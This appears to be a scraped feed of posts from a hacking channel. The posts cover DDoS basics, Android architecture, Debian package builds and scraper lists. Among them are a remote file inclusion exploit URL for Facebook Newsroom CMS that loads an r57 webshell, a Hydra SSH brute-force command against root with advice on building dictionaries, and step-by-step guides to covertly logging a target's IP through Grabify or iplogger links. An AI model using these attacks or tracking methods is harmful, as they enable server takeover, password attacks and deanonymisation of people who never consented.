▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑For beginers by undercode What is the principle of DDoS attack? Introduction to the principle of DDoS attack and protective measures

1) Definition of DDoS

The predecessor of DDos, the DoS (DenialofService) attack, means a denial of service attack. This attack behavior makes the website server flooded with a large amount of information requesting a reply, consumes network bandwidth or system resources, and causes the network or system to be overloaded and stop providing normal network service.

The DDoS distributed denial of service mainly uses the vulnerabilities of existing machines and systems on the Internet to capture a large number of networked hosts and make them a proxy for attackers.

When the number of controlled machines reaches a certain number, the attacker sends instructions to manipulate these attacking machines to launch DoS attacks on the target host or network at the same time, which consumes a large amount of its network belt and system resources, causing the network or system to be paralyzed or stop providing normal networks service. Due to the distributed nature of DDos, it has far more powerful attack and destructive power than Dos.

2) The principle of DDoS attack

look at picture a relatively complete DDos attack system is divided into four parts, namely the attacker (attacker can also be called master), control puppet machine (handler), attack puppet machine (demon, also called agent) and Victim.

Part 2 and Part 3 are used for control and actual attack. The control machine in the second part only issues orders and does not participate in the actual attack, and the third part attacks the actual DDoS attack package on the puppet machine.

For the second and third part of the computer, the attacker has control or partial control, and uploads the corresponding DDoS program to these platforms. These programs run like normal programs and wait for instructions from the attacker. Usually It also uses various means to hide itself from being discovered by others. In normal times, there is nothing unusual about these puppet machines, but once an attacker connects to them to control and issue instructions, the attacking puppet machine becomes the attacker to launch an attack.


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

EXTRACT PHONE NUMBER & EMAIL FROM INSTAGRAM :

What data can you export with GrowMeOrganic?
Instagram Username
Full Name
Email
Phone Number
Website
Bio
Country
City
Zip Code
Address
Followers Count
Following Count
Is Business
Category
Business Potential (Using Instagram AI)
Is Private
Is Verified


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The Polish hack group traded in extortion, SIM spoofing and even fake bomb threats
#CyberAttacks
_

For the first time in 10 years: Wikipedia will be redesigned
#Updates
_

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability :

Discovered by : Ciph3r
# MAIL : Ciph3r_blackhat@yahoo.com
# SP tanx4: Iranian hacker & Kurdish security TEAM
# sp TANX2: milw0rm.com & google.com & sourceforge.net
#
# CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515
# class : remote
# risk : high
# message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d
#####################################################
# C0de :

# require_once ($path.'/classes/feedStories.class.php');

EXPLOIT :

www.[Target].com/path/includes/home.php?path=[r57.txt?]

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Spy on the table: why are voice assistants dangerous?
#Vulnerabilities
_

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Overview of Android hierarchical security architecture and core components :
#FastTips

The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security. This article will introduce the Android hierarchical security architecture and its core components in detail.


1) The Android system inherits the security features of the Linux open source operating system and uses a hierarchical approach to ensure system security.
Android uses Linux 2.6 as the operating system, Linux 2.6 is a standard technology, and Linux is also an open operating system. Android's use of the operating system includes two parts: the core and the driver. The Linux core of Android is the standard Linux 2.6 kernel. Android needs more drivers related to mobile devices.

🦑The main drivers are as follows:

Display driver (DisplayDriver): commonly used Linux-based frame buffer (Frame Buffer) driver

Flash memory driver (FlashMemory Driver)

Camera driver (CameraDriver): commonly used Linux-based v4l (Video for) driver.

Audio Driver (AudioDriver): commonly used based on ALSA (Advanced Linux Sound Arc..

2) Various libraries (Libraries) and Android runtime environment (RunTime)
This level corresponds to the general embedded system and is equivalent to the middleware level. This level of Android is divided into two parts, one is various libraries, and the other is the Android runtime environment. The content of this layer is mostly implemented in C++. Among them, various libraries include:
C library: The standard library of C language, which is also one of the lowest level libraries in the system.

3) Application Framework (ApplicationFramework)
The Android application framework provides APIs for developers at the application layer. It is actually an application framework. Since the upper-level application is built in JAVA, the first level provided by this level includes the various controls needed in the UI program: for example: Views (view components) include lists (list), grids (grid), textboxes Text box), buttons (buttons), etc., and even an embedded Web browser. An Android application can make use of the following parts in the application framework: Activity, Broadcast IntentReceiver, Service, Content Provider.

4) Application
Android applications are mainly user interface (UserInterface), usually written in JAVA program, which can also contain various resource files (placed in the res directory). After the JAVA program and related resources are compiled, an APK package will be generated. Android itself provides many core applications such as the home screen (Home), contacts (Contact), phone (Phone), browser (Browsers) and so on. At the same time, application developers can also use the API of the application framework layer to implement their own programs.

#FastTips
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST FREE TV APPS FOR PHONE 2020 :

https://play.google.com/store/apps/details?id=live.free.tv_us&hl=en_US

https://play.google.com/store/apps/details?id=com.hulu.plus

https://apps.apple.com/us/app/hulu-watch-tv-shows-movies/id376510438

https://play.google.com/store/apps/details?id=com.jio.jioplay.tv

https://apps.apple.com/us/app/jiotv-live-tv-catch-up/id1060965205

https://play.google.com/store/apps/details?id=com.sonyliv

https://apps.apple.com/in/app/sonyliv-live-cricket-tv-movies/id587794258

https://play.google.com/store/apps/details?id=com.mxtech.videoplayer.ad

https://apps.apple.com/in/app/mx-player/id1429703801

https://play.google.com/store/apps/details?id=com.tubitv&hl=en

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to build Debian packages from source ?

Install the required build tools
To build a binary package from source, we first need to install the required build tools. Depending on the command line tool to build the binary package, you may need to install any of the following packages:

1-dpkg-dev
2-devscripts


1) These packages provide many tools for building binary packages from source.

To install "dpkg-dev", run:

$ sudo apt install dpkg-dev


2) To install the “devscripts” package, use the following command:

$ sudo apt install devscripts


3) Include source repositories
Make sure you enable the source repositories.

4) To do this, open the file /etc/apt/sources.list:

$ sudo vim /etc/apt/sources.list


5) You will see several lines in it as shown below:

# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu focal main restricted
# deb-src http://in.archive.ubuntu.com/ubuntu focal main restricted
[...]

6) To download the source packages, you need to uncomment the "deb-src" line. Remove the # character to uncomment the line. After uncommenting, the repository lines should look like this:

# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://in.archive.ubuntu.com/ubuntu focal main restricted
deb-src http://in.archive.ubuntu.com/ubuntu focal main restricted
[...]

Save and close the file. Update the list of repositories using the command:

$ sudo apt update

7) Download source packages
Download the source code of the package using the command “apt source <package-name>”. For example, the following command will download the source code for “grayex World!” program:

$ apt source yourname

8) Modify debian package source
Cd to the directory containing the package source code.

$ cd yourname-1.10

9) Modify the code as you wish. The code is located in the file "andreyex.c" in the "src" directory.

$ vi src / yourname.c

10) Change the code and / or make any changes. After editing the code, save and close the file.

It's time to create the actual .deb package.

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑for beginers How to find out someone else's IP (anyone) by sending him a link ?

A) IP logger
IP Logger URL Shortener allows you to track and log IP addresses, GPS location.

IP Logger URL Shortener provides IP address access checker, check what my IP services are, counters and informants.

Step 1. Go to the page https://iplogger.org.

Step 2. Select an option. Location Tracking, Image / Link, Invisible Logger

Step 3: For the purposes of this tutorial, we will be using URL Shortener.
Enter the URL and click Get Logger Code.

Step 4: Copy the IPLogger link for collecting statistics (no BB codes)

Step 5: Remember the IPLogger ID (required to access the registration statistics!), You will need it later to get registered IP addresses.

https://iplogger.org

B) Grabify
Grabify IP Logger allows you to track who clicked on your links. find IP addresses from Facebook, Twitter, friends on other sites.

Step 1: go to https://grabify.link

Step 2. Enter a webpage link to the Grabify website and click the Generate URL button,

Step 3: You will now have a new tracking link like for example. https://grabify.link/GK9OK5 you can use the button below to change the domain of the link to another domain that is less recognizable, or you can use your own domain.

Step 4: Save the tracking code or connection link you will need to get the IP addresses of those who clicked on your Grabify link.

https://grabify.link


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

hack android & windows via payloads with pictures

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐍 Brute SSH the remote server :


1) For brute-force attacks (brute-force attacks), we will use the Hydra tool , which is included with the Kali Linux distribution. SSH is present on any Linux or Unix server and is generally the primary use for administrators to access and control their systems.

Warning: Hydra is an attack tool

“ Use it only on your own systems and networks unless you have written permission from the owner. Otherwise, it is illegal . "

2) To implement the attack, use the command:

# hydra -s 22 -l root -P / usr / share / wordlists / fasttrack .txt 192.168.1.1 -t 4 ssh

3) Now let's analyze it:

- s - The flag indicates the port. It is worth noting that administrators can replace the default port 22 for the ssh service , in order to find out on which port the service is running, it is necessary to perform an initial scan of the target using the Nmap tool . We wrote about how to do this earlier in the article .

- l - the flag indicates the login, in our example we use root and admin. (we can provide a link to the dictionary here)

- P - the flag indicates the password, in our case we use the fasttrack .txt dictionary from the kali distribution , which is located in the / usr / share / wordlists / directory

4) It is worth noting that in order to effectively carry out a brute-force attack, it is worth paying due attention to the preparation of the dictionary, namely: taking into account geographical and linguistic peculiarities, including in the dictionary the name of the company, the names of its subsidiaries, the names of the operating services and applications, the names of employees, etc.

192.168.1.1 - ip address of the target, since the target we are using has a white ip, it is smeared

- t - the flag indicates the number of simultaneously used threads. We indicate 4

ssh - used protocol

5) Based on the results of the team's work, we see that the passwords from the dictionary did not fit for the admin and root logins

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SINCE LINUX IS A GOOD target BY HACKERS IN 2020
INSTALL 1 FROM THOSE ANTI-MALWARES & FIREWALLS :

https://www.clamav.net/

https://secure2.sophos.com/en-us/products/free-tools.aspx

https://firejailtools.wordpress.com/

http://rkhunter.sourceforge.net/

https://www.qubes-os.org/

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME FACEBOOK SCRAPER TOOLS 2020 :

facebook-post-scraper. Has comments. Uses Selenium.
facebook-scraper-selenium. "Scrape posts from any group or user into a .csv file without needing to register for any API access".
>https://github.com/brutalsavage/facebook-post-scraper

Ultimate Facebook Scraper. "Scrapes almost everything about a Facebook user's profile". Uses Selenium.
>https://github.com/apurvmishra99/facebook-scraper-selenium

Unofficial APIs. List of unofficial APIs for various services, none for Facebook for now, but might be worth to check in the future.
> https://github.com/Rolstenhouse/unofficial-apis

major-scrapy-spiders. Has a profile spider for Scrapy.
>https://github.com/talhashraf/major-scrapy-spiders

facebook-page-post-scraper. Seems abandoned.
FBLYZE. Fork (?).
> https://github.com/DIYgod/RSSHub/blob/master/lib/routes/facebook/page.js

RSSHub. Generates an RSS feed from Facebook pages.
RSS-Bridge. Also generates RSS feeds from Facebook pages.
> https://github.com/RSS-Bridge/rss-bridge/blob/master/bridges/FacebookBridge.php

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Serious RCE Flaw Revealed in Popular LibreOffice and OpenOffice Programs ?

1) It's since 2019 and simply opening an innocent office document file on your system could allow hackers to hack into your computer.

2) No, I'm not talking about another vulnerability in Microsoft Office, but about two other most popular alternatives - LibreOffice and Apache OpenOffice - free open source office software used by millions of Windows, MacOS and Linux users.

3) Security researcher Alex Infyur discovered a serious remote code execution (RCE) vulnerability in these two open source office suites, which could be caused by simply opening a maliciously crafted ODT (OpenDocument Text) file.

4) The attack relies on exploiting a directory traversal vulnerability, identified as CVE-2018-16858, to automatically launch a specific software-related python library using a hidden onmouseover event.

5)To exploit this vulnerability, Inführ created an ODT file with a white hyperlink (so it cannot be seen) that contains an "onmouseover" event to trick the victim into running a locally available python file on their system when placing the mouse anywhere. to an invisible hyperlink.

6) According to the researcher, a python file named "pydoc.py", which is part of LibreOffice's native Python interpreter, accepts arbitrary commands in one of its parameters and executes them through the command line or system console.

PoC Exploit example video :

https://www.youtube.com/watch?v=zVHsKPwtPo4


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁